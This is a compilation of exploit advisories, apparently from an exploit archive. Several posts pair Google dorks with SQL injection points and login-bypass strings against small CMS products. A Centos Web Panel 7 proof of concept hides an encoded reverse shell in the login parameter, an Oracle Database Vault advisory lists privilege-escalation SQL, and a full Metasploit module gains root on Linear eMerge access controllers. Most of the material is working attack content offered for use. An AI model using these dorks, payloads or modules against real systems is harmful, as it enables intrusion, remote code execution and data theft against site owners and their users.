<pre><code>====================================================================================================================================
| # Title : Dcastalia CMS v1.2 Unauthorized administrative access Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.1(64-bit) |
| # Vendor : https://dcastalia.com/ |
| # Dork : "Designed & developed by dcastalia" |
====================================================================================================================================

poc :


[+] Dorking in Google or other search engine.

[+] Admin panel : /admin/site/login

[+] Use payload : /admin/Packet.Storm*Security

[-] When you add any value (for example a path or a variable) after the control panel folder,
 an error page appears because the required file does not exist.
 At the same time, it shows you the control panel for the site, and it gives you control powers according to the site,
 including limited and full ones.

[+] https://www.127.0.0.1/admin/Packet%20Storm%20Security or https://www.127.0.0.1.com/admin/rbac/route


Greetings to :=========================================================================================================================
 |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |
 |
=======================================================================================================================================
</code></pre>
<pre><code>====================================================================================================================================
| # Title : Corpatech cms v2 SQL Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) |
| # Vendor : https://www.corpatech.be/ |
| # Dork : CorpaTech SiteAdmin |
====================================================================================================================================

poc :


[+] Dorking in Google or other search engine.

[+] http://127.0.0.1/galleriet.be/shop.php?cat=5 <====| inject here

[+] http://127.0.0.1/galleriet.be/admina/ <====| Login


Greetings to :=========================================================================================================================
 |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
 |
=======================================================================================================================================
</code></pre>
<pre><code>====================================================================================================================================
| # Title : BDWeb-Link Lms v1.11.5 Unauthorized administrative access Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) |
| # Vendor : https://bdweblink.com |
| # Dork : Developed by Developed by BD Web Link |
====================================================================================================================================

poc :


[+] Dorking in Google or other search engine.

[+] Use the payload to access the control panel and see the administration menu : load-admin-list.php or load-active-user-list.php

[+] https://127.0.0.1/bdweblink/load-active-user-list.php or https://127.0.0.1/bdweblink/load-admin-list.php


Greetings to :=========================================================================================================================
 |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
 |
=======================================================================================================================================
</code></pre>
<pre><code>====================================================================================================================================
| # Title : AdminSeg v2.15 Unauthorized administrative access Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.1(64-bit) |
| # Vendor : https://www.arwebs.net/producto/insurance-administration-software.html |
| # Dork : AdminSeg v2.15 |
====================================================================================================================================

poc :


[+] Dorking in Google or other search engine.

[+] By using this payload you can access the admin panel directly.

[+] payload : /adminseg/polizas.php

[+] https://www.127.0.0.1/v2.15/adminseg/polizas.php

Greetings to :=========================================================================================================================
 |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |
 |
=======================================================================================================================================
</code></pre>
<pre><code>====================================================================================================================================
| # Title : ADMINA BULGARIA Ltd v 1.0 SQL Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : http://admina.me/ |
| # Dork : " ADMINA BULGARIA Ltd.. All Rights Reserved. ." |
====================================================================================================================================

poc :


[+] Dorking in Google or other search engine.

[+] http://127.0.0.1/ADMINA/news_preview.php?getID=216 <====| inject here

[+] http://127.0.0.1/ADMINA/admina/ <====| Login


Greetings to :=========================================================================================================================
 |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
 |
=======================================================================================================================================
</code></pre>
<pre><code>====================================================================================================================================
| # Title : Eatself v1.1.5 Auth Bypass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : https://eatself.com/ |
| # Dork : " © Eatself. Tous droits réservés - v1.1.5." |
====================================================================================================================================

poc :


[+] Dorking in Google or other search engine.

[+] Use payload : user : 'or''='@gmail.com& Pass : 'or''=' (total control of admin panel)

[+] https://127.0.0.1/app.eatself/admin-login


Greetings to :=========================================================================================================================
 |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
 |
=======================================================================================================================================
</code></pre>
<pre><code>====================================================================================================================================
| # Title : Excel Net Computer Institute Version 4.1 SQL injection authentication bypass Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : https://www.excelnet.org/ |
| # Dork : "photos_view.php?pid=" |
====================================================================================================================================

poc :


[+] Dorking in Google or other search engine.

[+] Use path (/new/) to access the admin panel and gain full control of the website.

[+] Use payload for login information = user & pass : 1' or 1=1 -- -

[+] https://127.0.0.1/excelnet.41org/new/lead_home.php


Greetings to :=========================================================================================================================
 |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
 |
=======================================================================================================================================
</code></pre>
<pre><code>[+] Centos Web Panel 7 Unauthenticated Remote Code Execution
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
[+] CVE: CVE-2022-44877


Description
--------------
Bash commands can be executed because the login parameter is placed inside double quotes in the shell command used to log incorrect login entries, so command substitution in the value is expanded.

Video Proof of Concept
--------------
https://www.youtube.com/watch?v=kiLfSvc1SYY


Proof of concept:
--------------
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close

username=root&password=toor&commit=Login
--------------

Solution
--------
Upgrade to the current CWP7 version.


</code></pre>
<pre><code>
Title: CVE-2021-2175 – Oracle Database Vault Metadata Exposure Vulnerability
Product: Database
Manufacturer: Oracle
Affected Version(s): 12.1.0.2, 12.2.0.1, 18c, 19c
Tested Version(s): 19c
Risk Level: low
Solution Status: Fixed
CVE Reference: CVE-2021-2175
Author of Advisory: Emad Al-Mousa

Overview:

Oracle Database Vault is a security feature that imposes segregation of duties, such as account management, authorization, etc. In a nutshell, a DBA/system admin with access to the "SYS" user has limited power in terms of viewing data, creating accounts, etc.: the powers of the SYS account are stripped down.


*****************************************
Vulnerability Details:

Vulnerability in the Database Vault component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. This easily exploitable vulnerability allows a high-privileged attacker having the Create Any View, Select Any View privilege with network access via Oracle Net to compromise Database Vault. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Database Vault accessible data [metadata].

*****************************************
Proof of Concept (PoC):

The DBA_DV_REALM data dictionary view lists the realms (security policies configured for data protection) created in the current database instance. By default the SYS user has NO ACCESS to this information, since it exposes which data-protection measures are configured.

Access the database as the SYS account:

sqlplus / as sysdba

SQL> SELECT * FROM DBA_DV_REALM;

ERROR at line 1:

ORA-01031: insufficient privileges

// As expected, the SYS account can't view the contents of the view. However, let us do the following:

SQL> create view ORACLE_OCM.DUMMY_V as select * from DBA_DV_REALM;

SQL> select * from ORACLE_OCM.DUMMY_V;

// The ORACLE_OCM account is misconfigured and was granted extra access to the view, so when you create the view under that account you can read its contents, and now you can see exactly what the vault realm policies are configured to protect within the database system.

*****************************************
References:
https://www.oracle.com/security-alerts/cpuapr2021.html
https://databasesecurityninja.wordpress.com/2022/02/02/cve-2021-2175-database-vault-metadata-exposure-vulnerability/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-2175


Credit:
Emad Al-Mousa: CVE-2021-35576

</code></pre>
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/stopwatch'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Linear eMerge E3-Series Access Controller Command Injection',
        'Description' => %q{
          This module exploits a command injection vulnerability in the Linear eMerge
          E3-Series Access Controller. The Linear eMerge E3 versions `1.00-06` and below are vulnerable
          to unauthenticated command injection in card_scan_decoder.php via the `No` and `door` HTTP GET parameter.
          Successful exploitation results in command execution as the `root` user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Gjoko Krstic <gjoko[at]applied-risk.com>', # Discovery
          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor
        ],
        'References' => [
          [ 'CVE', '2019-7256'],
          [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],
          [ 'URL', 'https://na.niceforyou.com/' ],
          [ 'URL', 'https://attackerkb.com/topics/8WUJkci8N4/cve-2019-7256' ],
          [ 'EDB', '47649'],
          [ 'PACKETSTORM', '155256']
        ],
        'DisclosureDate' => '2019-10-29',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_ARMLE],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_bash'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_ARMLE],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 80,
          'SSL' => false
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options(
      [
        OptString.new('ROOT_PASSWORD', [ true, 'default root password on a vulnerable Linear eMerge E3-Series access controller', 'davestyle']),
      ]
    )
  end

  def execute_command(cmd, _opts = {})
    random_no = rand(30..100)
    return send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'card_scan_decoder.php'),
      'vars_get' =>
      {
        'No' => random_no,
        'door' => "`echo #{datastore['ROOT_PASSWORD']}|su -c \"#{cmd}\"`"
      }
    })
  rescue StandardError => e
    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
  end

  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution
  def check
    print_status("Checking if #{peer} can be exploited.")
    sleep_time = rand(2..10)
    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
    res, elapsed_time = Rex::Stopwatch.elapsed_time do
      execute_command("sleep #{sleep_time}")
    end

    return CheckCode::Unknown('No response received from the target!') unless res
    return CheckCode::Safe('Target is not affected by this vulnerability.') unless res.code == 200 && !res.body.blank? && res.body =~ /"card_format_default":"/

    print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")
    return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time

    CheckCode::Vulnerable('Successfully tested command injection.')
  end

  def exploit
    case target['Type']
    when :unix_cmd
      print_status("Executing #{target.name} with #{payload.encoded}")
      # Don't check the response here since the server won't respond
      # if the payload is successfully executed.
      execute_command(payload.encoded)
    when :linux_dropper
      print_status("Executing #{target.name}")
      execute_cmdstager(linemax: 262144)
    end
  end
end
</code></pre>